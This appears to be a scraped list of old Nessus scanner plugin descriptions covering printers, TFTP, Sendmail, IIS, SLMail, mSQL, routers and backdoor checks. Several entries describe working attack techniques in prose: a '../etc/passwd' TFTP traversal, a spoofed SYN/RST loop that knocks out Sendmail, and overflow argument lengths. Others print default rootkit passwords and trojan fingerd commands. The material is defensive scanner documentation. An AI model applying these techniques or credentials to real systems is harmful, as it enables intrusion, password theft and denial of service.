Information gatheringHP JetDirect TCP/IP problems: display hackattempts to write 'Nessus succeeded' on the remote printer LCDIt is sometimes possible to hack the display of a JetDirect printer, thus making write any text. This can be used by attackers in social engineering attack : first, write a 'hotline' phone number on the printer, then make the printer crash (using some well known methods tested by Nessus). This plugin attempts to write 'Nessus succeeded' on the printer display, but it can not check if it succeeds, so you will have to check by yourself. Risk factor: LowBased on the exploit by Silicosis sili@@l0pht.com
AttackLinux TFTP get fileAttempts to grab a via through a bug in some versions of tftpThere is a faulty access control implementation in some versions of the Linux tftp daemon. Most current tftpd implementations attempt to restrict access to files outside of the tftproot directory. The Linux implementations disallow any files with /../ in their pathnames, however one can still access files such as /etc/passwd by prepending ../ in front of the pathname (../etc/passwd). This will work since the current directory for tftpd is usually /ftpchr Risk factor : highno copyright
Denial of Serviceicmp redirectlicensed under the GPL
Denial of ServicesmadPrevents Sendmail from working properlySendmail accepts DoS attack This Linux specific attacks allows anyone to prevent sendmail from working properly In fact the simple algorithm proposed by Michal Zalewski can be performed in this way:
1. Attacker sends SYN from port X to victim, dst_port=25, spoof_addr SPOOFHOST (victim sends SYN/ACK to SPOOFHOST) 2. SPOOFHOST sends RST from port X to victim, dst_port=25 respecting sequence numbers (in reply to the SYN/ACK from victim). (victim got error on accept() - and enters 5 sec 'refusingconn' mode) 3. Wait approx. 2 seconds 4. Go to 1. This attack also works when SPOOFHOST = victim Risk factor : Medium/High
original code by Salvatore Sanfilippo [AntireZ]
Information gatheringNetBusdetects if NetBus is running on the remote hostNetBus is a trojan horse designed to take the control of a Win 95/98/NT computer. This plugin detects if it is installed... Risk factor : medium/highno copyright
Information gatheringBackOrificedetects if BackOrifice is running on the remote hostBackOrifice is a Windows 95/98 Trojan usually listenning on the UDP port 31337, designed to take the control of the infected computer. This plugin determines if BO is running on the ports 31337 and 53. Risk factor : medium/highno copyright
Attackftp PASV on connect crashes the FTP serverissues a PASV command upon the connectionSome FTP servers dump core when they are issued a PASV command as soon as the client connects. The FTP server will write a world readable core file which contains portions of the shadowed password file. This flaw allows local users to obtain the shadowed password file. Risk factor: medium/highno copyright
Attackshell interpreterdetermines if there are executables shells in the remote cgi-bin/Leaving executable shells in the cgi-bin directory of the remote web server can enable users to execute arbitrary commands on the target machine as the UID of the web server. This check checks for the following shells in your cgi-bin directory : ash bash csh ksh sh tcsh zsh Risk factor : Highno copyright
Information gatheringfinger redirection checkchecks whether the remote finger accepts requests like user@@host1@@targetThis plugin attempts to bounce a remote finger request through the target-host finger daemon. A request of the form : user@@host2@@target is made. If your finger daemon allows this kind of request, your host may be used by an attacker as a relay to gather informations about a third-party host. Solution : disable your finger daemon or replace it by a more secure oneno copyright
AttackNetscape FastTrack 'get'determines if the remote web server dumps the listing of / when issued the 'get' commandWhen some versions of the Netscape FastTrack server are issued a lower cased 'GET' command, they happily return the file listing of the current directory, rather than displaying the 'index.html' file of the directory. This vulnerability may help the intruders to find out files that are normally hidden. Risk factor : Low/Mediumno copyright
Information gatheringfinger backdoor checkdetermines if the remote fingerd is a trojanA widely ditributed backdoor fingerd is used by script kiddies to maintain their accounts. Basically, this daemon recognizes several commands cmd_adduser cmd_stealth cmd_deluser cmd_rootsh cmd_cleanup Nessus will try the command 'cmd_rootsh' to determine if the remote finger daemon is a trojan If it is a trojan, it means that your system has been compromised, so you will have to double check its config Risk factor: Highno copyright
AttackRootKittries to login to the remote system using the default RootKit password'RootKit' is the name of a popular set of SunOS utilities that are used by hackers to backdoor a compromised host. This plugin attempts to check if this kit has been installed by trying the default username and password which is root/D13HH[no copyright
AttackHidesourcetries to login to the remote system using the default Hidesource password'Hidesource' is the name of a popular set of SunOS utilities that are used by hackers to backdoor a compromised host. This plugin attempts to check if this kit has been installed by trying the default username and password which is wank/wankno copyright
AttackHidepaktries to login to the remote system using the default Hidepak password'Hidepak' is the name of a popular set of Solaris utilities that are used by hackers to backdoor a compromised host. This plugin attempts to check if this kit has been installed by trying the default username and password which is wank/wankno copyright
Information gatheringFSP DaemonChecks if the remote host has a running FSP daemonThis plugin checks whether a host is running an FSP daemon. FSP is a file transfer protocol similar to FTP which uses UDP to transport files. FSP is widely used by attackers to move files from host to host. It is also used widely by software pirates to allow easy access to caches of illicit software.
If Nessus discovers that you are running a FSP daemon, you should check for the evidence of break-ins into the remote system Risk Factor: Medium
Based on the code of Wen-King Su (wen-king@@vlsi.cs.caltech.edu)
AttackSolaris Automountd exploitChecks if automountd is enabledThere is a flaw in the Solaris rpc.statd and automountd which may allow an intruder to execute any command remotely as root. This plugin warns the user that automountd is enabled but **DOESN'T TEST IF THE VULNERABILITYIS PRESENT**. Risk factor : Highwritten after the advisory of Corruptio Optimi Pessima
AttackmSQL DBname remote exploitoverflows a buffer in the remote msql serverThe mysqlInit() function can be passed too long args which will make a buffer overflow which may allow remote users to gain a shell remotely mSQL v1.0.xx -> Vulnerable to the whole possibilities of exploiting (arbitrary commands) and denial of service (debug and dbname).
mSQL v2.0.2 and prior -> Vulnerable to the possibility of exploiting (arbitrary commands) and denial of service (debug and dbname).
mSQL v2.0.3 and above -> Not vulnerable to the exploiting vulnerability (arbitrary commands) but it's still vulnerable to Denial of Service (debug and dbname).
Risk factor : Medium/High
Sekure SDI Secure Coding Team
AttackmSQL debug remote exploitoverflows a buffer in the remote msql server set to debug modeAn attacker may use mSQL to gain a shell remotely when the environment variable MSQL_DEBUG (for version 2.0) or MINERVA_DEBUG (for version 1.0) is set. mSQL v1.0.xx -> Vulnerable to the whole possibilities of exploiting (arbitrary commands) and denial of service (debug and dbname).
mSQL v2.0.2 and prior -> Vulnerable to the possibility of exploiting (arbitrary commands) and denial of service (debug and dbname).
mSQL v2.0.3 and above -> Not vulnerable to the exploiting vulnerability (arbitrary commands) but it's still vulnerable to Denial of Service (debug and dbname).
Risk factor : Medium/High
Sekure SDI Secure Coding Team
Information gatheringSendmail redirection attackcheck if specific message routing can be performedDue to strange address parsing policy [briefly: if address ends with local hostname, trim it and parse as any other (even if after this operation address isn't 'local' anymore], specific message routing (eg. through internal, protected or external networks) can be forced, giving an occasion to perform anonymous scanning (or fakemailing). You could call it 'feature' instead of 'bug', but it seems to be Sendmail-specific ;> Simple fix - in /etc/sendmail.cf, at the top of ruleset 98, insert following line: R$*@@$*@@$* $#error $@@ 5.7.1 $: "551 Sorry, no redirections.\
Risk factor : Low/Medium
Michal Zalewski
AttackMicrosoft Personnal Web Server '.....'Attempts to get the root listing of the remote web serverIt is possible to list and download any file on a remote windows 95 host that has MS PWS installed by requesting '......' which will list the root directory Risk factor : highdiscovered by Sean Coates
Denial of ServiceLotus Notes MTA dosmakes the Lotus MTA crashIt is possible to crash the Lotus Notes MTA by sending it two HELO commands, both on the Solaris and Windows platform. An attacker can prevent the incoming mail from being delivered. Risk factor : Medium/Highfound by Siva Sankar Adiraju
Denial of ServiceIIS ftp server crashcrashes an IIS ftp serverIt is possible to make the IIS FTP server close all the active connections by issuing a too long NLST command which will make the FTP server crash An attacker can use this to prevent people from downloading anything from your FTP server Risk factor: mediumno copyright
Denial of Serviceosharecrashes a Win98 computerIt is possible to crash a Windows 98 computer by sending it a badly formed packet. This plugin implements the oshare attack, the details of which can be found in the BugTraq archive Risk factor : Highoriginal code by R00t Zer0
AttackExAir possible DoSdetermines the presence of some ExAir scriptsThis plugin is for those that have Internet Information Server 4 installed with the IIS sample site "ExAir\ There are three Active Server Pages that, if called directly without the default ExAir page and associated dlls ever having been loaded into the IIS memory space, will hang and eventually time out after 90 secs - the default script timeout period. Whilst in this state, processor usage increases to 100% and the server becomes very sluggish.
This plugin does not perform this denial of service attack Risk factor : High
mnemonix
AttackPerl.exe and IIS securityattempts to find the location of the remote web rootThere is a problem with perl.exe similar to the issue discussed in KB article Q193689 where the physical disk location of a virtual web directory can be ascertained.
In all versions of IIS, where a website has been configured to interpret perl scripts using the perl executable (perl.exe), a problem exists where arequest for a non-existent file will return the physical location on a disk of a web directory. This may be of some interest to attackers who gain more knowledge about the attacked target Risk factor : Low
mnemonix
AttackIIS /scripts directory browsablechecks whether the remote /scripts/ directory is browseableThis plugin checks whether the remote server /scripts directory is browsable or not. A browsable scripts directory will allow an attacker to search for potentially vulnerable scripts more efficiently, and to test your home made scripts too Risk factor : Mediumdistributed under the GPL
Attackslmail HELO buffer overflowbuffer overflow for the SLMail SMTP serverThe SLMail service listens on several ports, one of which is 27 which provided SMTP services in addition to port 25. On this port, issuing an HELO command with an argument longer than 855 chars will make a buffer overflow which may allow an attacker to execute arbitrary code on the remote host. Risk factor : Highno copyright
Denial of Serviceslmail:27 VRFY overflowbuffer overflow for the SLMail SMTP serverThe SLMail service listens on several ports, one of which is 27 which provided SMTP services in addition to port 25. On this port, issuing an VRFY command with an argument longer than 855 chars will make the remote server crash Risk factor : Highno copyright
Denial of ServiceRouter Access Port DoSperforms a denial of service against the remote routerIt is possible to disable the TCP access / configuration ports on most routers by sending a shoving a few thousand bytes of any character down the connection to ports 23, 2001, 4001, 6001 and 9001. Some routers have to be reset manually while some others will need from 30 seconds to several days to recover. An attacker can use this weakness to bring down a part or even your whole network. Risk factor : HighHD Moore
Attackunfsd bugAttempts to guess the file handle of the remote root fsThere is a security problem in unfsd version 2.0 and earlier which allows an attacker to guess the file handle of the root filesystem by trying reasonable combinations of device and inode number in succession and attempting to get its attribute handle from the server.
If this is successful, this means that an attacker may mount your exported filesystems easily. Risk factor : High
0. Kirch
Information gatheringSendmail Relayingchecks whether sendmail can do relayingThis plugin determines whether your sendmail server can be used as a mail relay. If it can, then it may be subject to spammers who can then relay their mails Mail relaying is bad because it overloads your server since the spammers usually send thousands of mails. Risk factor : lowno copyright
Information gatheringTCP Chorusingbug described by Dan Kaminsky